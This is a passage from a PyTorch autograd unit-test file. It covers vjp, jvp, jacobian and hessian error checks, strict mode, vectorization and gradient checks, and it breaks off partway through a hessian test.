y = f(a)
memory_with_grad = torch.cuda.memory_allocated()
del a
del y
# without grad
a = torch.ones(1, requires_grad=True, device="cuda")
with torch.no_grad():
y = f(a)
memory_without_grad = torch.cuda.memory_allocated()
self.assertGreater(memory_with_grad, memory_without_grad)
del a
del y
# with hooks
with torch.autograd.graph.save_on_cpu():
a = torch.ones(1, requires_grad=True, device="cuda")
y = f(a)
memory_with_hooks = torch.cuda.memory_allocated()
self.assertEqual(memory_with_hooks, memory_without_grad)
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental prototype
# warning; it is not nice for a public-facing API to raise a warning
# no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs, test_forward_ad=True):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result_backward_mode = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result_backward_mode, expected)
if test_forward_ad:
result_forward_mode = autogradF.jacobian(f, inputs, strategy="forward-mode", vectorize=True)
self.assertEqual(result_forward_mode, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
# The Jacobian computed using forward AD has the dtype of the output
# but the Jacobian computed with reverse AD has dtype of input
self._check_jacobian_vectorize_correctness(f, (x, y), test_forward_ad=False)
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
result_forward_mode = autogradF.hessian(f, inputs, outer_jacobian_strategy="forward-mode", vectorize=True)
self.assertEqual(result_forward_mode, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.ones([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
